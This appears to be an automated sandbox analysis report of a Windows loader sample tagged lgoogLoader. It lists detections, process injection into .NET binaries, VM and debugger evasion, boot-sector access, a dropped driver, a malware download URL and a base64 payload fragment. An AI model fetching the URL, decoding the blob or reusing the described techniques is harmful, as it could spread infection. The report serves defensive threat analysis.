Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:	file.exe
Analysis ID:	862324
MD5:	851dfeb9035473532d796a9b41608b3c
SHA1:	beca84bb1ffd0146f8e5b87a01b14b42e8d50e2b
SHA256:	5867c5321292565fa017f4e88b6c4894572d7fa557e9a0ddb1ced4362413b6b3
Tags:	exe
Infos:

Detection

lgoogLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected lgoogLoader

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Writes to foreign memory regions

Contains functionality to infect the boot sector

Sample is not signed and drops a device driver

Contain functionality to detect virtual machines

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

.NET source code contains very large strings

Contains functionality to inject code into remote processes

Sample uses string decryption to hide its real strings

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Contains functionality to launch a process as a different user

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Enables debug privileges

PE file does not import any functions

Sample file is different than original file name gathered from version info

Enables driver privileges

Drops PE files

Creates driver files

Contains functionality to launch a program with higher privileges

Spawns drivers

PE / OLE file has an invalid certificate

Creates or modifies windows services

Dropped file seen in connection with other malware

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

file.exe (PID: 6596 cmdline: C:\Users\user\Desktop\file.exe MD5: 851DFEB9035473532D796A9B41608B3C)

jsc.exe (PID: 2040 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe MD5: 2B40A449D6034F41771A460DADD53A60)

mscorsvw.exe (PID: 3092 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe MD5: B00E9325AC7356A3F4864EAAAD48E13F)

aspnet_compiler.exe (PID: 4768 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe MD5: 7809A19AA8DA1A41F36B60B0664C4E20)

RegSvcs.exe (PID: 7156 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe MD5: 59FCE79E9D81AB9E2ED4C3561205F5DF)

dfsvc.exe (PID: 4136 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe MD5: 48FD4DD682051712E3E7757C525DED71)

aspnet_regbrowsers.exe (PID: 2192 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe MD5: BF7E443F1E1FA88AD5A2A5EB44F42834)

AddInProcess32.exe (PID: 4740 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
LgoogLoader	LgoogLoader is an installer that drops three files: a batch file, an AutoIt interpreter, and an AutoIt script. After downloading, it executes the batch file.	No Attribution	https://blog.polyswarm.io/nullmixer-drops-multiple-malware-families	https://malpedia.caad.fkie.fraunhofer.de/details/win.lgoogloader

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.392576863.0000000001380000.00000040.00001000.00020000.00000000.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth (Nextron Systems)	0xade:$xo1: \x9E\xA2\xA3\xB9\xEA\xBA\xB8\xA5\xAD\xB8\xAB\xA7\xEA\xA9\xAB\xA4\xA4\xA5\xBE\xEA\xA8\xAF\xEA\xB8\xBF\xA4\xEA\xA3\xA4\xEA\x8E\x85\x99\xEA\xA7\xA5\xAE\xAF 0x6546:$xo1: \x9E\xA2\xA3\xB9\xEA\xBA\xB8\xA5\xAD\xB8\xAB\xA7\xEA\xA9\xAB\xA4\xA4\xA5\xBE\xEA\xA8\xAF\xEA\xB8\xBF\xA4\xEA\xA3\xA4\xEA\x8E\x85\x99\xEA\xA7\xA5\xAE\xAF
00000007.00000002.392576863.0000000001380000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_lGoogLoader	Yara detected lgoogLoader	Joe Security

Joe Sandbox Signatures

• AV Detection
• Compliance
• Networking
• System Summary
• Data Obfuscation
• Persistence and Installation Behavior
• Boot Survival
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Anti Debugging
• HIPS / PFW / Operating System Protection Evasion
• Language, Device and Operating System Detection

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: file.exe	ReversingLabs: Detection: 13%
Source: file.exe	Virustotal: Detection: 20%			Perma Link

Antivirus detection for URL or domain

Source: http://109.206.241.33/files/1un.config.CfgEncFile	Avira URL Cloud: Label: malware
Source: http://109.206.241.33/files/1un.config.CfgEncFileMZ	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: http://109.206.241.33/files/1un.config.CfgEncFile

Virustotal: Detection: 16%

Perma Link

Sample uses string decryption to hide its real strings

Source: 7.2.AddInProcess32.exe.400000.0.raw.unpack

String decryptor: e_lh_fMLH^ff

Source: 7.2.AddInProcess32.exe.400000.0.unpack	Avira: Label: TR/Patched.Gen
Source: 7.2.AddInProcess32.exe.2b50000.4.unpack	Avira: Label: TR/Crypt.XPACK.Gen3

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: c:\src\ShellRunas\Release\ShellRunas.pdb source: AddInProcess32.exe, AddInProcess32.exe, 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: <c:\src\ShellRunas\Release\ShellRunas.pdb source: AddInProcess32.exe, 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: C:\agent\1\s\sys\x64\Release\ProcExpDriver.pdb source: ?????.sys.0.dr
Source:	Binary string: C:\Users\Konka\source\repos\WinFormGregorCatch\obj\x86\Debug\WinFormGregorCatch.pdb source: file.exe

Source: AddInProcess32.exe	String found in binary or memory: http://109.206.241.33/files/1un.config.CfgEncFile
Source: AddInProcess32.exe, 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmp, AddInProcess32.exe, 00000007.00000002.392608147.0000000002B40000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://109.206.241.33/files/1un.config.CfgEncFileMZ
Source: file.exe	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: file.exe	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: file.exe	String found in binary or memory: http://ocsp.sectigo.com0
Source: AddInProcess32.exe	String found in binary or memory: http://www.sysinternals.com
Source: AddInProcess32.exe, 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.sysinternals.comopen/?ICONSHELLRUNASAboutUsage/raw/netonlyRunAsInvoker__COMPAT_LAYERcmd
Source: file.exe	String found in binary or memory: https://sectigo.com/CPS0
Source: ?????.sys.0.dr	String found in binary or memory: https://www.sysinternals.com0

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe

Code function: 7_2_02B51000 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,Sleep,PathFileExistsW,DeleteFileW,URLDownloadToFileW,PathFileExistsW,GetProcessHeap,HeapAlloc,StrCatW,StrCatW,StrCatW,CreateProcessW,CloseHandle,CloseHandle,CloseHandle,Sleep,

7_2_02B51000

System Summary

.NET source code contains very large strings

Source: file.exe, u9ff3???????????????/??????????????????.cs

Long String: Length: 636952

Source: 00000007.00000002.392576863.0000000001380000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth (Nextron Systems), description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 7_2_00404AF0	7_2_00404AF0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 7_2_004084B7	7_2_004084B7
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 7_2_01381AA8	7_2_01381AA8

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe

Code function: 7_2_00402050 _memset,_memset,_memset,_memset,_memset,__wcsicmp,__wcsicmp,__wcsicmp,SetEnvironmentVariableW,_memset,_wcscpy_s,_wcscat_s,CreateProcessW,GetLastError,__wcsicmp,__wcsicmp,__wcsicmp,__wcsicmp,__wcsicmp,__wcsicmp,__wcsicmp,_wcscpy_s,_memset,_memset,_memset,CreateProcessWithLogonW,GetLastError,EnumWindows,Sleep,Sleep,EnumWindows,CloseHandle,CloseHandle,CloseHandle,LoadIconW,LoadIconW,LoadIconW,LoadCursorW,RegisterClassExW,CreateDialogParamW,GetMessageW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,GetMessageW,LocalFree,

7_2_00402050

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe

Code function: 7_2_02B5355B: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,lstrcpyA,lstrcatA,lstrcatA,StrNCatA,CloseHandle,StrNCatA,

7_2_02B5355B

Source: file.exe

Static PE information: No import functions for PE file found

Source: file.exe, 00000000.00000000.310047330.000001C5BAD38000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameWinFormGregorCatch.exeF vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameWinFormGregorCatch.exeF vs file.exe

Source: C:\Users\user\Desktop\file.exe

Process token adjusted: Load Driver

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\?????.sys

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Driver loaded: \Registry\Machine\System\CurrentControlSet\Services\TaskKill

Jump to behavior

Source: file.exe

Static PE information: invalid certificate

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\?????.sys 440883CD9D6A76DB5E53517D0EC7FE13D5A50D2F6A7F91ECFC863BC3490E4F5C

Source: file.exe	ReversingLabs: Detection: 13%
Source: file.exe	Virustotal: Detection: 20%

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\file.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\?????.sys

Jump to behavior

Source: ?????.sys.0.dr

Binary string: \DosDevices\PROCEXP152\ObjectTypes\\Device\PROCEXP152PsAcquireProcessExitSynchronizationPsReleaseProcessExitSynchronizationMmGetMaximumNonPagedPoolInBytesObGetObjectTypeMutantIoCreateDeviceSecureIoValidateDeviceIoControlAccessD:P

Source: classification engine

Classification label: mal100.troj.evad.winEXE@15/2@0/0

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe

Code function: 7_2_004029C0 _memset,_memset,SHGetMalloc,SHGetDesktopFolder,SearchPathW,GetLastError,CoInitialize,CoCreateInstance,#217,#173,CoUninitialize,

7_2_004029C0

Source: file.exe	Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
Source: C:\Users\user\Desktop\file.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll			Jump to behavior

Source: file.exe, u9ff3???????????????/??????????????????.cs

Base64 encoded string: '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

Source: file.exe, u9ff3???????????????/??????????????????.cs

Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: file.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: file.exe

Static file information: File size 1338216 > 1048576

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x144800

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: c:\src\ShellRunas\Release\ShellRunas.pdb source: AddInProcess32.exe, AddInProcess32.exe, 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: <c:\src\ShellRunas\Release\ShellRunas.pdb source: AddInProcess32.exe, 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: C:\agent\1\s\sys\x64\Release\ProcExpDriver.pdb source: ?????.sys.0.dr
Source:	Binary string: C:\Users\Konka\source\repos\WinFormGregorCatch\obj\x86\Debug\WinFormGregorCatch.pdb source: file.exe

Data Obfuscation

Yara detected lgoogLoader

Source: Yara match

File source: 00000007.00000002.392576863.0000000001380000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

.NET source code contains potential unpacker

Source: file.exe, u9ff3???????????????/??????????????????.cs

.Net Code: .ctor System.Reflection.Assembly System.AppDomain::Load(System.Byte[])

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 7_2_00404ACD push ecx; ret	7_2_00404AE0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 7_2_01382D32 push cs; retf	7_2_01382D36
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 7_2_0138155C push es; retf	7_2_01381571
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 7_2_013821DB push edx; ret	7_2_013821DC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 7_2_01382DD4 push cs; retf	7_2_01382DEA
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 7_2_01382DC3 push cs; retf	7_2_01382DD1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 7_2_01382036 push ss; retf	7_2_0138204B
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 7_2_01382E0D push cs; retf	7_2_01382E1B
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 7_2_01384A8A push esi; iretd	7_2_01384A8D

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe

Code function: 7_2_00402CB0 _memset,_memset,_wcscpy_s,_wcscat_s,LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,GetLastError,LoadLibraryW,GetProcAddress,_wcschr,_wcscpy_s,GetComputerNameW,CredUIParseUserNameW,CoTaskMemFree,

7_2_00402CB0

Persistence and Installation Behavior

Contains functionality to infect the boot sector

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe

Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,lstrcpyA,lstrcatA,lstrcatA,StrNCatA,CloseHandle,StrNCatA, \\.\PhysicalDrive%d

7_2_02B5355B

Sample is not signed and drops a device driver

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\?????.sys

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\?????.sys

Jump to dropped file

Boot Survival

Contains functionality to infect the boot sector

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe

Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,lstrcpyA,lstrcatA,lstrcatA,StrNCatA,CloseHandle,StrNCatA, \\.\PhysicalDrive%d

7_2_02B5355B

Source: C:\Users\user\Desktop\file.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TaskKill

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Contain functionality to detect virtual machines

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe

Code function: VMware VBox QEMU QEMU VMware VBox QEMU QEMU

7_2_02B5372C

Source: C:\Users\user\Desktop\file.exe TID: 6576

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_7-7671

Source: C:\Users\user\Desktop\file.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\?????.sys

Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

